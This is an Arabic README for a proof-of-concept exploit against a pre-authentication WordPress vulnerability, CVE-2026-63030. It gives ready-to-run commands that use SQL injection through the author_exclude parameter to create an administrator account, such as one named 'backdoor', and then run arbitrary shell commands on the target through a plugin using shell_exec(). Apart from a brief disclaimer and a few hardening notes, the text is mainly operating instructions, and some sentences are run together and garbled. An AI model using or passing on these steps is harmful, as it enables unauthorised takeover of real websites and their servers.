
استغلال إثبات المفهوم لـ CVE-2026-63030، ثغرة ما قبل المصادقة في ووردبريس (الإصدارات من 6.9.0 حتى 7.0.1).
استغلال إثبات مفهوم لـ CVE-2026-63030، وهي ثغرة قبل المصادقة في WordPress (الإصدارات 6.9.0 حتى 7.0.1). يجمع ما يلي:
author_excludepython3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
| الوسيط | الوصف |
|---|---|
--url | رابط الجذر لموقع WordPress الهدف (مطلوب) |
--username | اسم مستخدم المسؤول الذي سيتم إنشاؤه (يُولَّد تلقائيًا إذا تم حذفه) |
--password | كلمة مرور المسؤول (تُولَّد تلقائيًا إذا تم حذفها) |
--email | بريد المسؤول الإلكتروني (يُولَّد تلقائيًا إذا تم حذفه) |
--command, -c | الأمر المراد تنفيذه عبر الإضافة (الافتراضي: id) |
--post-id | تحديد معرف منشور منشور (يُكتشف تلقائيًا إذا تم حذفه) |
--timeout | مهلة HTTP بالثواني (الافتراضي: 60) |
# Auto-exploit with random admin credentials and run 'id'
python3 exploit.py --url http://192.168.1.100/wordpress/
# Custom admin and command
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude خبيث، مستغلًا خلط المسار لتنفيذ استعلام UNION.shell_exec().هذا مجرد إثبات مفهوم.
وهو مخصص لـ:
لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.
wp-config.php محصّن، فقد يفشل حقن SQL.DISALLOW_FILE_MODS وDISALLOW_UNFILTERED_HTML في إعدادات الهدف.